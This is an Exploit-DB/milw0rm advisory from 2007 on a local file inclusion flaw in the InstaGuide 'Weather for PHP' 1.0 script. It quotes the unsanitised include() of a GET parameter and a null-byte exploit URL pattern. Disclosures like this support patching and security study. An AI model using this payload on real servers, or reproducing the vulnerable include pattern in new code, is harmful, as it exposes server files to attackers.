InstaGuide Weather Script index.php 1.0 - Local File Inclusion Vulnerability

2007-10-22T00:00:00
ID EDB-ID:4558
Type exploitdb
Reporter BorN To K!LL
Modified 2007-10-22T00:00:00

Description

InstaGuide Weather Script (index.php) Local File Inclusion Vulnerability. CVE-2007-5674. Webapps exploit for php platform

                                        
                                            Weather for PHP <= (PageName) Local File Include Vulnerability

Script : Weather for PHP

Version : 1.0

Download : http://www.instaguide.com/download/weather_free.zip
 
AUTHOR : BorN To K!LL

Vuln Code :

$PageName = $_GET['PageName'];     //// this is one ... :)

include("includes/content/$PageName.php")   //// this is two ... :)

Exploit :

[path]/index.php?PageName[Local File]%00

Greetings :

str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ...

BorN To K!LL <> Dr.2 = 4ever .... =D

# milw0rm.com [2007-10-22]